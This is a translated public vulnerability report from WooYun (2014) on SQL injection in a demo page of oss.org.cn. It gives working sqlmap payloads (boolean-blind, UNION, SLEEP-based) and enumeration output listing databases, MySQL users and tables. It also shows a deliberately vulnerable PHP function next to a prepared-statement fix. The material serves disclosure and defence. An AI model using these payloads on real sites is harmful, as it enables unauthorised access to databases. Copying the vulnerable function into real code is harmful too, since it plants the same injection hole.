
Vulnerability summary

Defect ID: wooyun-2014-079592

Title: SQL injection on an 开源中国 (Open Source China) site leads to full database compromise

Vendor: 开源中国

Author: 爱上平顶山

Submitted: 2014-10-16 14:05

Fix time: 2014-11-30 14:06

Published: 2014-11-30 14:06

Type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-10-16: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-11-30: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

...

Detailed description:

开源中国 (Open Source China)
http://www.oss.org.cn
Injection point:
http://yp.oss.org.cn/software/show_demo.php?sw_id=155&demo_no=1
sqlmap identified the following injection points with a total of 32 HTTP(s) requests:
---
Place: GET
Parameter: sw_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sw_id=155' AND 3336=3336 AND 'gJEs'='gJEs&demo_no=1
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 29 columns
Payload: sw_id=155' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e75743a,0x6f456c574d63696c6272,0x3a7077653a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&demo_no=1
Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sw_id=155' AND SLEEP(5) AND 'yCzV'='yCzV&demo_no=1
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
available databases [15]:
[*] drupal_a
[*] information_schema
[*] mysql
[*] newcopy
[*] nickblog
[*] ossbbs
[*] osscms
[*] performance_schema
[*] phpmyadmin
[*] test
[*] ucenter
[*] uchome
[*] webanalytics
[*] wordpress
[*] yellowpagedb
database management system users [147]:
[*] ''@'localhost'
[*] ''@'osscenter435'
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'remoteuser'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'osscenter435'
database management system users password hashes:
current database: 'yellowpagedb'
Database: yellowpagedb
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| doc_tag_tf | 481642 |
| doc_tag_cos | 481484 |
| doc_tag_tfidf | 481484 |
| doc_tag_cos_temp | 365050 |
| yp_access_statistics | 187795 |
| doc_tag_idf | 138515 |
| sw_score_history | 13183 |
| doc_tagabs | 4241 |
| doc_infor | 4220 |
| sw_score | 2638 |
| sw_info | 2625 |
| search | 2579 |
| sw_platform | 2268 |
| sw_resource | 2167 |
| sw_comment | 1065 |
| user_info | 634 |
| sw_demo | 103 |
| sw_type | 63 |
| yp_module | 27 |
| license | 18 |
| yp_question | 9 |
| yp_platform | 7 |
| function_group | 6 |
| yp_journal | 5 |
| test | 2 |
| yp_keywords | 1 |
+----------------------+---------+
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Database: ossbbs
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| cdb_memberfields | 15957 |
| cdb_members | 15957 |
| cdb_regips | 8000 |
| cdb_onlinetime | 2977 |
| cdb_admincustom | 1791 |
| cdb_prompt | 1248 |
| cdb_mytasks | 1141 |
| cdb_favoritethreads | 762 |
| cdb_posts | 479 |
| cdb_threads | 250 |
| cdb_settings | 248 |
| cdb_statvars | 216 |
| cdb_stylevars | 141 |
| cdb_rsscaches | 138 |
| cdb_smilies | 89 |
| cdb_typeoptions | 65 |
| cdb_stats | 52 |
| cdb_caches | 42 |
| cdb_faqs | 34 |
| cdb_request | 22 |
| cdb_myposts | 19 |
| cdb_forumfields | 18 |
| cdb_forums | 18 |
| cdb_usergroups | 15 |
| cdb_taskvars | 14 |
| cdb_crons | 12 |
| cdb_magics | 12 |
| cdb_mythreads | 11 |
| cdb_projects | 11 |
| cdb_medals | 10 |
| cdb_creditslog | 7 |
| cdb_tasks | 7 |
| cdb_prompttype | 6 |
| cdb_spacecaches | 6 |
| cdb_words | 6 |
| cdb_navs | 5 |
| cdb_pluginvars | 5 |
| cdb_ranks | 5 |
| cdb_bbcodes | 4 |
| cdb_onlinelist | 4 |
| cdb_typemodels | 4 |
| cdb_addons | 3 |
| cdb_admingroups | 3 |
| cdb_imagetypes | 3 |
| cdb_plugins | 3 |
| cdb_styles | 3 |
| cdb_tags | 3 |
| cdb_templates | 3 |
| cdb_threadtags | 3 |
| cdb_itempool | 2 |
| cdb_moderators | 2 |
| cdb_adminsessions | 1 |
| cdb_attachments | 1 |
| cdb_failedlogins | 1 |
| cdb_invites | 1 |
+---------------------+---------+
OK, I won't go any deeper~

Proof of vulnerability:

As above

Fix recommendation:

Filter the input
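The one-word fix above, shown as working code. This is an added example and not the oss.org.cn source, which the report does not include; the sw_demo table comes from the sqlmap listing, while the column names and the yp_readonly account are assumptions.

```php
<?php
// Added example, not code from oss.org.cn (the page does not show its source).
// Assumed: sw_demo(sw_id INT, demo_no INT, demo_name, demo_url) in yellowpagedb;
// the table is listed by sqlmap above, the column names are invented here.

// Vulnerable shape: the request values are spliced into the SQL text, so a
// value such as  155' AND SLEEP(5) AND 'a'='a  becomes part of the statement.
function show_demo_vulnerable(mysqli $db, array $get)
{
    $sql = "SELECT demo_name, demo_url FROM sw_demo"
         . " WHERE sw_id = '" . $get['sw_id'] . "'"
         . " AND demo_no = '" . $get['demo_no'] . "'";
    return $db->query($sql);
}

// Hardened shape: reject anything that is not a positive integer, then bind
// the values through a server-side prepared statement. Bound values travel
// separately from the SQL text, so quotes, AND, UNION or SLEEP() inside them
// are just data and cannot change the query.
function show_demo_safe(PDO $db, array $get)
{
    $opts = array('options' => array('min_range' => 1));
    $sw_id   = filter_var(isset($get['sw_id'])   ? $get['sw_id']   : '', FILTER_VALIDATE_INT, $opts);
    $demo_no = filter_var(isset($get['demo_no']) ? $get['demo_no'] : '', FILTER_VALIDATE_INT, $opts);
    if ($sw_id === false || $demo_no === false) {
        header('HTTP/1.0 400 Bad Request');   // PHP 5.3 has no http_response_code()
        return array();
    }
    $stmt = $db->prepare(
        'SELECT demo_name, demo_url FROM sw_demo WHERE sw_id = :sw_id AND demo_no = :demo_no'
    );
    $stmt->bindValue(':sw_id',   $sw_id,   PDO::PARAM_INT);
    $stmt->bindValue(':demo_no', $demo_no, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection for the hardened version. ATTR_EMULATE_PREPARES=false makes MySQL
// itself prepare the statement instead of the PDO driver interpolating values
// client-side; the account should be a dedicated user with SELECT on
// yellowpagedb only (credentials here are placeholders).
$db = new PDO(
    'mysql:host=localhost;dbname=yellowpagedb;charset=utf8',
    'yp_readonly', '<placeholder password>',
    array(PDO::ATTR_EMULATE_PREPARES => false,
          PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION)
);
foreach (show_demo_safe($db, $_GET) as $row) {
    echo htmlspecialchars($row['demo_name'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

The enumeration above (15 databases visible, the MySQL user list readable) shows the application account had far more privilege than a demo page needs; a least-privilege account limits what any remaining injection can reach.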

Copyright notice: when reposting, please credit the source 爱上平顶山@乌云


Vulnerability response

Vendor response:

Could not contact the vendor, or the vendor actively refused


Vulnerability rating:

Comments

  1. 2014-10-16 14:18 | 开源中国 (WooYun vendor)

    You still need to write the domain name in, otherwise people will think this is oschina.net; this vulnerability is in oss.org.cn.

  2. 2014-10-16 14:31 | 爱上平顶山 certified white hat ( core white hat | Rank:2738 vulns:547 | [no hat] a stranger in a foreign land; formerly worked at a certain agency in the Celestial Empire; IT...)

    @开源中国 Sorry, WooYun assigned it to the wrong vendor; I only sent it to the Internet Emergency Center, heh.

  3. 2014-10-16 15:28 | 寂寞的瘦子 ( ordinary white hat | Rank:242 vulns:53 | the theory that every language compiles down to assembly)

    @开源中国 Is 红薯's backside clenching up again~

  4. 2014-10-17 07:08 | teamtopkarl ( intern white hat | Rank:48 vulns:7 | always keeping my passion for the network security cause)

    I already reported this on 360 a long time ago.